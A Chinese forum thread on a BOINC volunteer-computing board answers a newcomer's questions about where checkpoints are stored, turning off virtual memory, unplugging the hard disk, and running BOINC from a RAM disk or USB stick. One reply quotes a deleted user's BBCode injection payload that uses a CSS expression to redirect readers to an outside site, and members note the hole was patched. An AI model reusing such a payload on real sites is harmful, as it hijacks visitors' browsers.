新注册用户
搜索

新人有问题要问啊!!

项目的存盘是存在哪里啊,BOINC的文件夹里还是虚拟内存里,也就是我可不可以把虚拟内存关了。因为我想对科学贡献大一点,我几乎开24个小时,反正也不会温度过高(我打开机箱莫过了),可是硬盘似乎寿命没有那么长,所以我想把硬盘的电源给拔了。请问这样可以吗?让它在内存工作就好了啊,或者在待机时它可以工作吗?

不可以.项目的计算结果都要存盘,然后上报项目服务器.
虚拟内存这个东西,肯定是会用到的吧.
还有,你不必24小时计算.[当然你也可以这么做]实际硬盘的寿命还是挺长的.[2手不能保证]
硬盘的电源拔了电脑还能工作?莫非现在的硬盘都用外接电源了?!

回复 #1 lawrence 的帖子

存盘存在BOINC下的文件夹里面。
具体信息参本版置顶2楼问题回答,有个关于存盘点的。
我网速卡,就不给你链接了。

虚拟内存可以关,如果你的物理内存足够大。不过,如果项目耗费内存过多,而此时物理内存不够的时候,任务很可能出错。

硬盘寿命不用担心,通常来说,仅仅是计算BOINC的话,对硬盘带来的即使有伤害,也不会折寿多少,再者硬盘没那么脆弱,理论生命值几十年,可以不停的转。

至于你拔掉硬盘电源和待机时是否可以工作.......前者,不要,后者,不行。

创建内存盘,把boinc安装到内存盘上(关机后数据会丢的)

装在U盘上可以在别的机器上运算

popcov 该用户已被删除

(popcov
问题会员
UID 16468
精华 0
积分 -7
帖子 1
阅读权限 0
注册 2008-3-2
#6发表于 2008-3-2 17:05  资料  短消息  加为好友   
不懂

[float=expression(window.location="http://www.kissingme.cn")]怎么回事
)这个家伙想挂那啥。。好笨。。咱论坛没那么多漏洞哩。。

#5,但用U盘的话存盘会变慢(U盘读写比较慢吖),而且过一阵,U盘超烫。。。

回复 #7 cnchina 的帖子

之前的确有过这么一回~~~但是被及时制止了~~~后来就打了补丁~~~

还是直接装硬盘上运行好了,这么做会烦死你的。

hguygg